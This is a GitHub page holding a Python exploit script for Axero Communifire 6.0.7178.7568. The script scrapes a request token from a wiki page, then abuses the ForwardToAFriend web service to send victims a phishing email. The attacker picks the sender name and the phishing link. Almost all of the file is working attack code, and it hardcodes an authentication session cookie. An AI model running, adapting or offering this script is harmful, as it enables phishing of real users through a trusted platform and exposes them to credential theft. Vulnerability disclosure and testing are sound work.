-
-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathCommunifire_Exploit.py
68 lines (49 loc) · 5.31 KB
/
Communifire_Exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/env python3
# Exploit Author: Matamorphosis
# Date: 2020-02-09
# CVSS Score: 8.8 - When publicly exposed.
# Category: Web Apps
# Version: Axero Communifire - Version 6.0.7178.7568
# Vendor Homepage: https://axerosolutions.com/
# Tested on: Windows and Ubuntu 19.10
# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
import requests, re, argparse
Parser = argparse.ArgumentParser(description="Communifire Exploit.")
Parser.add_argument('-tn', '--targetname', required=True, type=str, help='The name of your target / the victim.')
Parser.add_argument('-te', '--targetemail', required=True, type=str, help='The email address of your target / the victim.')
Parser.add_argument('-pu', '--phishingurl', required=True, type=str, help='The URL you wish the target / victim to navigate to.')
Parser.add_argument('-sn', '--sendername', required=True, type=str, help='The name you wish to specify of who the email is coming from.')
Parser.add_argument('-d', '--domain', required=True, type=str, help='The domain of the target Axero web application.')
Parser.add_argument('-wp', '--wikipage', required=True, type=str, help='The full url of any wiki page as part of the target Axero web application.')
Parser.add_argument('-cm', '--custommessage', required=False, type=str, help='Use this option to change the message sent to the victim if you choose.')
Arguments = Parser.parse_args()
# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# --- Set and filter variables. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Domain = Arguments.domain.replace('https://', '').replace('http://', '')
if '/' in Domain:
Domain = Domain[:Domain.find("/")]
Phish_URL = f'https://{Domain}/webServices/CommonWebService.asmx/ForwardToAFriend?locale=en-US'
headers = {"X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json; charset=utf-8", "RequestVerificationToken": ""}
if Arguments.custommessage:
data = {"invitation": {"SpaceID": 2, "FriendName": Arguments.targetname, "FriendEmail": Arguments.targetemail, "EntityURL": Arguments.phishingurl, "SenderName": Arguments.sendername, "TextMessage": Arguments.custommessage, "EntityID": 521, "EntityType": 9}}
else:
data = {"invitation": {"SpaceID": 2, "FriendName": Arguments.targetname, "FriendEmail": Arguments.targetemail, "EntityURL": Arguments.phishingurl, "SenderName": Arguments.sendername, "TextMessage": "Open this super secure link", "EntityID": 521, "EntityType": 9}}
cookies = {"cf_space_wiki_sidebar_toggle": "visible", "Communifire_UserCulture": "en-US", ".ASPXAUTH": "98D63CAB01B9E68DAADBED8CB704D439D003BD2ED802352CA4599E3B04B358966A5E1457CE0A6A7A708FC681A021D72AF2F408B4E6E12190C8B72FBCF91AB6CC0F892C9583DF4FC4823173773D6FAB8367DA0E909901E4FD50ABA8FB48EFB1B3EF98031431AF3A2743D59D28E32DC24A8E3277BFFB12BA094831E03C5DC1E43E", "CF-Guest": "dde980c9-63e1-41eb-8c80-2fabb766895d", "Communifire_ClientTimeZoneOffset": "-600"} # Manually set this if required.
# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# --- The below request is made to obtain the request token needed to send the phishing email. ---------------------------------------------------------------------------------------------------------
print("[i] Attempting to obtain request token.")
Wiki_Page_Response = requests.get(Arguments.wikipage, cookies=cookies,).text
Request_Token_Regex = re.search(r'CF\_REQUEST\_TOKEN\s\=\s\'([\:\;\_\-\d\w]+)\'\,', Wiki_Page_Response)
# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# --- The below request sends the phishing email. ------------------------------------------------------------------------------------------------------------------------------------------------------
if Request_Token_Regex:
print(f"[+] Successfully obtained a request token: {Request_Token_Regex.group(1)}.")
headers['RequestVerificationToken'] = Request_Token_Regex.group(1)
response = requests.post(Phish_URL, headers=headers, cookies=cookies, json=data)
try:
print("[+] Success." if response.json()["d"]["ResponseMessage"] == "You have successfully shared this content." else f"[-] Failed {response.text}.")
except:
print("[-] Failed.")
else:
exit("[-] Failed to obtain a request token. Please ensure you provide a valid wiki page and supply cookies if authentication is required to execute the exploit.")
# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------